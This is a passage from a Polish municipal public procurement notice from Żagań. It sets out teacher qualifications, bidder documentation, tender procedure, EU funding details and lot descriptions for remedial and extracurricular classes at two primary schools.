1) w zakresie prowadzenia zajęć dydaktyczno-wyrównawczych   z języka polskiego    (dotyczy części  1 i 10 przedmiotu  zamówienia ):  Nauczyciel języka polskiego, posiadający przygotowanie pedagogiczne (w rozumieniu przepisów Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudniać nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50 poz. 400);  
2) w zakresie zajęć dydaktyczno -wyrównawczych z matematyki  oraz  dodatkowych zajęć pozalekcyjnych ukierunkowanych na rozwój zainteresowań i umiejętności uczniów z akademii matematycznej ( dot. części 2,4, 11,13 :Nauczyciel matematyki, posiadający przygotowanie pedagogiczne (w rozumieniu  przepisów Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudniać nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50 poz. 400); 
3) w zakresie zajęć dydaktyczno -wyrównawczych z języka angielskiego  oraz  dodatkowych zajęć pozalekcyjnych ukierunkowanych na rozwój zainteresowań i umiejętności uczniów z akademii języka angielskiego ( dot. części 3, 6, 12,15)  : Nauczyciel  posiadający  kwalifikacje i wykształcenie niezbędne do nauczania języka angielskiego tj. ukończył studia pierwszego stopnia w rozumieniu ustawy z dnia 27 lipca 2005 r. Prawo o szkolnictwie wyższym Dz. U. Nr 164, poz. 1365 z późn.zm. na kierunku filologia w specjalności język angielski lub lingwistyki stosowanej w zakresie języka angielskiego  lub ukończyli nauczycielskie kolegium języków obcych w zakresie nauczania języka angielskiego, posiadają przygotowanie pedagogiczne   (w rozumieniu  przepisów Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i  wypadków, w których można zatrudniać nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50 poz. 400);
4) zakresie   dodatkowych zajęć pozalekcyjnych ukierunkowanych na rozwój zainteresowań i umiejętności uczniów z akademii przyrodniczej (dot. części 5,14)  : Nauczyciel przyrody lub geografii lub biologii lub chemii lub fizyki, posiadając przygotowanie pedagogiczne (w rozumieniu  przepisów Rozporządzenia Ministra Edukacji  Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od  nauczycieli oraz określenia szkół i wypadków, w których można zatrudniać nauczycieli nie  mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. Nr 50 poz. 400);  
5) w zakresie zajęć terapeutycznych dla uczniów z orzeczeniem o niepełnosprawności  (dot. części 7 i 16 )  :  Nauczyciel posiadający kwalifikacje z terapii pedagogicznej lub oligofrenopedagogiki lub pedagogiki specjalnej  lub opiekuńczo-wychowawczej lub pomocy psychologicznej lub  socjoterapeutycznej. Posiadają przygotowanie pedagogiczne (w rozumieniu  przepisów Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudniać nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50 poz. 400);   
6) w zakresie warsztatów psychologiczno - pedagogicznych (dot. części 8 i 17 )  : 
Nauczyciel posiadający kwalifikacje z terapii pedagogicznej lub oligofrenopedagogiki lub pedagogiki specjalnej  lub opiekuńczo-wychowawczej lub pomocy psychologicznej lub  socjoterapeutycznej. Posiadają przygotowanie pedagogiczne (w rozumieniu   przepisów Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudniać nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50 poz. 400);   
7) w zakresie Dziecięcej Akademii Przedsiębiorczości (dot. części 9 i 18 )  :  Nauczyciel posiadający kwalifikacje z terapii pedagogicznej lub oligofrenopedagogiki lub pedagogiki specjalnej  lub opiekuńczo-wychowawczej lub pomocy psychologicznej lub  socjoterapeutycznej. Posiadają przygotowanie pedagogiczne (w rozumieniu   przepisów Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudniać nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50 poz. 400).  
2.5.Zamawiający określając wymóg w zakresie posiadanych kwalifikacji, dopuszcza  kwalifikacje, które zostały wydane na podstawie ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U.z 2008 r. nr 63, poz. 394). Wykonawcy z innych państw członkowskich mogą  spełnić  ten warunek posiadając równoważne uprawnienia uzyskane w swoich krajach pochodzenia.   
Na potwierdzenie spełnienia powyższych warunków Wykonawca złoży wraz z ofertą  
dokumenty określone w sekcji III.4.1 pozycja 1 i 2 ogłoszenia.  Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie. Wykonawca może polegać na wiedzy i doświadczeniu innych  podmiotów, niezależnie od  charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia oraz składając dokumenty dotyczące tego podmiotu określone w sekcji III.4.2.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5)  w zakresie sytuacji ekonomicznej i finansowej,   Zamawiający  nie precyzuje żadnych warunków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie na podstawie art.44 ustawy Prawo zamówień publicznych w zakresie art. 22 ust.1 ustawy. Stosowne pełnomocnictwo w zakresie określonym  w specyfikacji Istotnych Warunków Zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający - na podstawie art.144 ust.1 i 2 Ustawy Prawo zamówień publicznych dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z zakresie : 
a) Podwykonawstwa - Wykonawca  z powodu zdarzeń  losowych może powierzyć  za 
    zgodą Zamawiającego wykonanie przedmiotu umowy osobie trzeciej - 
    podwykonawcy. W  tym zakresie stosować należy odpowiednio art. 6471   § 2 
    Kodeksu cywilnego, zgodnie  z którym Wykonawca będzie zobowiązany  do 
    przedstawienia Zamawiającemu własnej faktury (rachunku) i faktury (rachunku) 
    wystawionej przez Podwykonawcę wraz z  dowodem zapłaty należności 
    wynikającej z faktury (rachunku) dla Podwykonawcy.  W przypadku niezapłacenia 
    należności dla Podwykonawcy - Wykonawca wyraża zgodę na zapłacenie tej 
    faktury przez Zamawiającego. W takim przypadku Zamawiający zapłaci 
    wynagrodzenie Wykonawcy wynikające z jego faktury (rachunku) w wysokości 
    pomniejszonej o tę część wynagrodzenia, która została zapłacona 
    Podwykonawcy,  
b) zmianę terminów realizacji zamówienia z przyczyn niezawinionych od Wykonawcy 
    lub Zamawiającego, które to przyczyny każda ze stron zobowiązana jest 
    udokumentować, pod warunkiem, że takiej zgody udzieli instytucja 
    dofinansowująca i że Zamawiający z  tego tytułu nie straci dofinansowania;
c) jeżeli nastąpi zmiana obowiązujących przepisów prawa w zakresie mających wpływ 
    na realizację przedmiotu zamówienia;
d) ze względu na dofinansowanie przedmiotu zamówienia ze środków finansowych z 
    Unii Europejskiej możliwa jest zmiana umowy w zakresie konieczności 
    dostosowania umowy z Wykonawcą do postanowień umowy o dofinansowanie.
2.Zmiana umowy dokonana z naruszeniem w/w przepisu podlega  unieważnieniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.zagan.pl     lub bip.zagan.pl /zakładka przetargi publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Urzędzie Miasta Żagań,  Plac Słowiański 17 pok. nr 26,68-100 Żagań, Wydział Zamówień Publicznych i Nadzoru Właścicielskiego - na pisemny wniosek Wykonawcy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2013 godzina 11:00, miejsce: Urząd  Miasta Żagań,  Plac Słowiański 17,68-100 Żagań, pok. nr 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia  publicznego  jest dofinansowany ze środków Unii  Europejskiej  w ramach projektu pn. Wyrównywanie szans edukacyjnych i rozwój kompetencji kluczowych w uczniów PSP 1 i PSP 2 w Żaganiu, realizowanych przez Gminę Żagań o statusie miejskim w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz  zmniejszenie różnic w jakości usług edukacyjnych, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego  nr projektu ; WND-POKL.09.01.02-08-040/13..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia  dydaktyczno-wyrównawcze z języka polskiego w  Publicznej Szkole Podstawowej Nr 1 w Żaganiu ul. Wojska Polskiego 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie  zadania 1 -zajęcia  dydaktyczno-wyrównawcze z języka polskiego  
Zajęcia w trzech grupach klas IV, V, VI po 30 godzin. Liczba godzin łącznie - 90, w tym 30 godzin w 2013 roku i 60 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia  dydaktyczno-wyrównawcze z matematyki  w Publicznej Szkole Podstawowej Nr 1 w Żaganiu ul. Wojska Polskiego 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie  zadania 1 -zajęcia  dydaktyczno-wyrównawcze z matematyki    
Zajęcia w trzech grupach klas IV, V, VI po 30 godzin. Liczba godzin łącznie - 90, w tym 30 godzin w 2013 roku i 60 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia  dydaktyczno-wyrównawcze z  języka angielskiego w Publicznej Szkole Podstawowej Nr 1 w Żaganiu ul. Wojska Polskiego 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie  zadania 1 -zajęcia  dydaktyczno-wyrównawcze z  języka angielskiego
Zajęcia w trzech grupach klas IV, V, VI po 30 godzin. Liczba godzin łącznie - 90, w tym 30 godzin w 2013 roku i 60 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dodatkowe  zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów - akademia matematyczna w Publicznej Szkole Podstawowej Nr 1 w Żaganiu ul. Wojska Polskiego 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 2 - dodatkowe  zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów - akademia matematyczna 
Zajęcia w trzech grupach klas IV, V, VI po 60 godzin. Liczba godzin łącznie - 180, w tym 60 godzin w 2013 roku i 120 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dodatkowe  zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów - akademia przyrodnicza w Publicznej Szkole Podstawowej Nr 1 w Żaganiu ul. Wojska Polskiego 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 2 - dodatkowe  zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów - akademia przyrodnicza 
Zajęcia w trzech grupach klas IV, V, VI po 60 godzin. Liczba godzin łącznie - 180, w tym 60 godzin w 2013 roku i 120 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów - akademia języka angielskiego w Publicznej Szkole Podstawowej Nr 1 w Żaganiu ul. Wojska Polskiego 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 2 - dodatkowe  zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów - akademia języka angielskiego 
Zajęcia w trzech grupach klas IV, V, VI po 30 godzin. Liczba godzin łącznie - 90, w tym 30 godzin w 2013 roku i 60 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zajęcia terapeutyczne dla uczniów klas IV, V, VI z orzeczeniem o niepełnosprawności w Publicznej Szkole Podstawowej Nr 1 w Żaganiu ul. Wojska Polskiego 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 3 - zajęcia terapeutyczne dla uczniów klas IV, V, VI z orzeczeniem o niepełnosprawności.  
Zajęcia w dwóch grupach  mieszanych ( tj. uczniowie klas IV, V, VI razem)  po 30 godzin. Liczba godzin łącznie - 60, w tym 20 godzin w 2013 roku i 40 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Warsztaty psychologiczno - pedagogiczne
w Publicznej Szkole Podstawowej Nr 1 w Żaganiu ul. Wojska Polskiego 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 4 - warsztaty psychologiczno - pedagogiczne.
Zajęcia w dwóch grupach  mieszanych ( tj. uczniowie klas IV, V, VI razem)  po 30 godzin. Liczba godzin łącznie - 60, w tym 20 godzin w 2013 roku i 40 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dziecięca Akademia Przedsiębiorczości w Publicznej Szkole Podstawowej Nr 1 w Żaganiu ul. Wojska Polskiego 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 5 - Dziecięca Akademia Przedsiębiorczości.
Zajęcia w jednej grupie  mieszanej ( tj. uczniowie klas IV, V, VI razem)  30 godzin. Liczba godzin łącznie - 30, w tym 10 godzin w 2013 roku i 20 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> W zakresie zadania 6- zajęcia dydaktyczno-wyrównawcze z  języka polskiego w Publicznej Szkole Podstawowej Nr 2 w Żaganiu ul. Wojska Polskiego 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 6- zajęcia dydaktyczno-wyrównawcze z  języka polskiego. 
Zajęcia w trzech grupach klas IV, V, VI po 30 godzin. Liczba godzin łącznie - 90, w tym 30 godzin w 2013 roku i 60 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> W zakresie zadania 6- zajęcia dydaktyczno-wyrównawcze z  matematyki  w Publicznej Szkole Podstawowej Nr 2 w Żaganiu ul. Wojska Polskiego 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 6- zajęcia dydaktyczno-wyrównawcze z  matematyki   
Zajęcia w trzech grupach klas IV, V, VI po 30 godzin. Liczba godzin łącznie - 90, w tym 30 godzin w 2013 roku i 60 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> W zakresie zadania 6- zajęcia dydaktyczno-wyrównawcze z  języka angielskiego  w Publicznej Szkole Podstawowej Nr 2 w Żaganiu ul. Wojska Polskiego 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 6- zajęcia dydaktyczno-wyrównawcze z  języka  angielskiego 
Zajęcia w trzech grupach klas IV, V, VI po 30 godzin. Liczba godzin łącznie - 90, w tym 30 godzin w 2013 roku i 60 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Dodatkowe  zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów  - akademia matematyczna w Publicznej Szkole Podstawowej Nr 2 w Żaganiu ul. Wojska Polskiego 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 7 - dodatkowe  zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów  - akademia matematyczna 
Zajęcia w trzech grupach klas IV, V, VI po 60 godzin. Liczba godzin łącznie - 180, w tym 60 godzin w 2013 roku i 120 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Dodatkowe  zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów  - akademia przyrodnicza w Publicznej Szkole Podstawowej Nr 2 w Żaganiu ul. Wojska Polskiego 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 7 - dodatkowe  zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów  - akademia przyrodnicza 
Zajęcia w trzech grupach klas IV, V, VI po 60 godzin. Liczba godzin łącznie - 180, w tym 60 godzin w 2013 roku i 120 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Dodatkowe  zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów  - akademia języka angielskiego w Publicznej Szkole Podstawowej Nr 2 w Żaganiu ul. Wojska Polskiego 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 7 - dodatkowe  zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów  - akademia języka angielskiego 
Zajęcia w trzech grupach klas IV, V, VI po 30 godzin. Liczba godzin łącznie - 90, w tym 30 godzin w 2013 roku i 60 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zajęcia terapeutyczne dla uczniów klas IV, V, VI z orzeczeniem o niepełnosprawności w Publicznej Szkole Podstawowej nr 2 w Żaganiu ul. Wojska Polskiego 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 8 - zajęcia terapeutyczne dla uczniów klas IV, V, VI z orzeczeniem o niepełnosprawności.  
Zajęcia w dwóch grupach  mieszanych ( tj. uczniowie klas IV, V, VI razem)  po 30 godzin. Liczba godzin łącznie - 60, w tym 20 godzin w 2013 roku i 40 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Warsztaty psychologiczno - pedagogiczne
w Publicznej Szkole Podstawowej nr 2 w Żaganiu ul. Wojska Polskiego 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie zadania 9 - warsztaty psychologiczno - pedagogiczne. 
Zajęcia w dwóch grupach  mieszanych ( tj. uczniowie klas IV, V, VI razem)  po 30 godzin. Liczba godzin łącznie - 60, w tym 20 godzin w 2013 roku i 40 godzin w 2014 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
